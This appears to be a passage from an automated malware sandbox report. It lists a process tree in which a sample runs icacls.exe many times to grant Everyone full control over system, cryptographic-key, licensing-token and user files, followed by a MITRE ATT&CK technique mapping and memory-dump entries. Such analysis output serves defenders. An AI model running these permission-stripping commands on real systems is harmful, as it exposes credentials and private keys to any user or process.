  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:1668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1712
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1352
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr /grant Everyone:F /T /C /Q
  2⤵
  PID:1592
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1520
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:852
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1712
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_queue.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_property.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_settings.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1352
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\netfol.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1592
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ringtones.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1520
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\settings.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\sync.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:852
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\wmp.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1712
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png /grant Everyone:F /T /C /Q
  2⤵
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_14c10c19-3a0b-4ef0-8928-af871cb14c00 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:796
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Updater6\AdobeESDGlobalApps.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:564
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata /grant Everyone:F /T /C /Q
  2⤵
  PID:1076
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\deployment.properties /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Everywhere.search-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Indexed Locations.search-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:1764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\AddGroup.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\AssertNew.emz /grant Everyone:F /T /C /Q
  2⤵
  PID:1920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\BackupTrace.tif /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\BlockWait.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:1780
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ClearWait.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1732
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompareSwitch.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConfirmSet.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConvertGroup.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:1668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConvertToPublish.eps /grant Everyone:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConvertToRequest.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DebugResize.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ExpandDisconnect.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\InstallLock.cr2 /grant Everyone:F /T /C /Q
  2⤵
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\InvokeUse.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:1568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\JoinTrace.svg /grant Everyone:F /T /C /Q
  2⤵
  PID:828
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\MeasureDisable.cr2 /grant Everyone:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\MergeApprove.tiff /grant Everyone:F /T /C /Q
  2⤵
  PID:276
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\OutUnlock.svgz /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PopShow.crw /grant Everyone:F /T /C /Q
  2⤵
  PID:596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PopUnpublish.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RemoveGrant.eps /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1940
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RequestEnable.dxf /grant Everyone:F /T /C /Q
  2⤵
  PID:1964
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RequestGrant.emz /grant Everyone:F /T /C /Q
  2⤵
  PID:2012
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ResolveRedo.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:1496
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RevokeEdit.crw /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:620
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UnprotectBackup.crw /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UnregisterUninstall.emz /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\WaitConvert.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2004
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\Wallpaper.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\WatchPing.tiff /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1324
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\CloseLock.aiff /grant Everyone:F /T /C /Q
  2⤵
  PID:564
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConfirmHide.txt /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConvertComplete.kix /grant Everyone:F /T /C /Q
  2⤵
  PID:1144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConvertToRestart.rm /grant Everyone:F /T /C /Q
  2⤵
  PID:276
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\DenyReceive.wav /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\EnableSearch.css /grant Everyone:F /T /C /Q
  2⤵
  PID:1584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ExitDebug.xlsm /grant Everyone:F /T /C /Q
  2⤵
  PID:596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\GroupAssert.jpeg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\HideDisconnect.mov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:944
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\InstallRestore.png /grant Everyone:F /T /C /Q
  2⤵
  PID:480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\MergeUndo.htm /grant Everyone:F /T /C /Q
  2⤵
  PID:1776
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\MountUnregister.jpeg /grant Everyone:F /T /C /Q
  2⤵
  PID:1500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\PopRestore.mht /grant Everyone:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\PublishCompress.tiff /grant Everyone:F /T /C /Q
  2⤵
  PID:1864
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RestartExpand.pdf /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RestartPing.vbs /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:884
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SaveDebug.dib /grant Everyone:F /T /C /Q
  2⤵
  PID:1308
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SaveExport.wax /grant Everyone:F /T /C /Q
  2⤵
  PID:1488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\StartRemove.mov /grant Everyone:F /T /C /Q
  2⤵
  PID:564
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\TraceResume.mpe /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UndoAssert.odt /grant Everyone:F /T /C /Q
  2⤵
  PID:1680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UnregisterBlock.m4a /grant Everyone:F /T /C /Q
  2⤵
  PID:1760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\WatchBackup.pptx /grant Everyone:F /T /C /Q
  2⤵
  PID:1764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1780
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1792
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Money.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1692
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url /grant Everyone:F /T /C /Q
  2⤵
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1504
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url /grant Everyone:F /T /C /Q
  2⤵
  PID:272
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1300

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1363905297-3790925001018146473-947902720-32676072-2698771831545134349682734478"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-192654003319468685851016773754-21290101921164816781-1939861613-1155751753748307847"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9179640559562302841379109074425107959-10032419991167373045688934954-263595551"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-212522866-590402947-207282744-304362794-55179482218908590081316156709-511953520"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-239055415-813671708-89462619821972863920816823750839792677005711-1344750021"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "417453626140994921-1959722272-67051847216837455951574935194-985073622165024806"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/280-60-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/280-62-0x000000001AD50000-0x000000001AD52000-memory.dmp

Filesize
8KB

Download
memory/1300-69-0x000000001AD90000-0x000000001AD91000-memory.dmp

Filesize
4KB

Download
memory/1300-65-0x000007FEFB561000-0x000007FEFB563000-memory.dmp

Filesize
8KB

Download
memory/1300-72-0x0000000001FF0000-0x0000000001FF1000-memory.dmp

Filesize
4KB

Download
memory/1300-78-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/1300-75-0x000000001AD14000-0x000000001AD16000-memory.dmp

Filesize
8KB

Download
memory/1300-68-0x0000000001F10000-0x0000000001F11000-memory.dmp

Filesize
4KB

Download
memory/1300-74-0x000000001AD10000-0x000000001AD12000-memory.dmp

Filesize
8KB

Download
memory/1776-195-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/1776-200-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/1776-196-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/1776-199-0x000000001ABA4000-0x000000001ABA6000-memory.dmp

Filesize
8KB

Download
memory/1776-197-0x00000000023F0000-0x00000000023F1000-memory.dmp

Filesize
4KB

Download
memory/1776-198-0x000000001ABA0000-0x000000001ABA2000-memory.dmp

Filesize
8KB

Download
memory/1784-76-0x0000000002610000-0x0000000002612000-memory.dmp

Filesize
8KB

Download
memory/1784-90-0x000000001B540000-0x000000001B541000-memory.dmp

Filesize
4KB

Download
memory/1784-117-0x0000000002900000-0x0000000002901000-memory.dmp

Filesize
4KB

Download
memory/1784-87-0x000000001B510000-0x000000001B511000-memory.dmp

Filesize
4KB

Download
memory/1784-118-0x000000001AB00000-0x000000001AB01000-memory.dmp

Filesize
4KB

Download
memory/1784-77-0x0000000002614000-0x0000000002616000-memory.dmp

Filesize
8KB

Download